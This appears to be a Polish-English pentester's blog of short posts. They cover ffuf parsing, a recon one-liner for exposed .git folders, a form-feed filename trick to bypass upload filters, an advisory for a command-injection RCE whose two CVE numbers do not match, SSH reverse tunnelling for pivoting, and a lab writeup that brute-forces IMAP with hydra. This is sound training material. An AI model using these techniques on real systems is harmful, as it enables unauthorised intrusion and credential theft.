środa, 16 września 2020

How to parse ffuf output file

ffuf -o output_file cat output_file | jq -c '.results[] | {url:.url,status: .status}' for file in dirb/*; do cat $file | jq -c '.results[] | {url:.url,status: .status}'; done

czwartek, 3 września 2020

Jak wygląda szybka infekcja ransomware wszystkich boxów w sieci? właśnie tak


środa, 26 sierpnia 2020

find .git repo!

curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

piątek, 3 lipca 2020

Form Feed U+000C

 Znak, który czasami pozwala wyeskejpowac rozszerzenie plików w apkach webowych - •
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close

Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html


wtorek, 5 maja 2020

Alcatel-Lucent Security Advisory: CVE-2020-1179 (RCE)

OTMS remote code execution

I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.

Description of the vulnerability

Cgi script vmconstruct.cgi is vulnerable to shell command injection attacks through HTTP POST request. An attacker with an OT administrator cookie can inject arbitrary OS command using semicolon (;) character in the web request.


OS command injection vulnerabilities can lead to elevate shell access on OT server for the attacker.

Reference: CVE-2020-11794
Date: April 15th, 2020
Risk: High
Impact: Get access
Attack expertise: Skilled, Administrative user
Attack requirements: Remote
CVSS score: 8.0 (HIGH)

czwartek, 26 marca 2020

SSH socks proxy beetwen Lan1 and Lan2

Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
Linux in Lan2: SSH -L 5000: w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000

niedziela, 22 marca 2020

Lab Pentestit 14 - writeup

  1. Crack password for mail
# cat logins_mail.txt                                                                                                                        

hydra -L logins_mail.txt  -P /tmp/1 imap:// -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://


[143][imap] host:   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12

telnet imap                                                         
Connected to
Escape character is '^]'.
a1 LOGIN support@test.lab PASSWORD
a1 OK
telnet> quit
Connection closed.

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.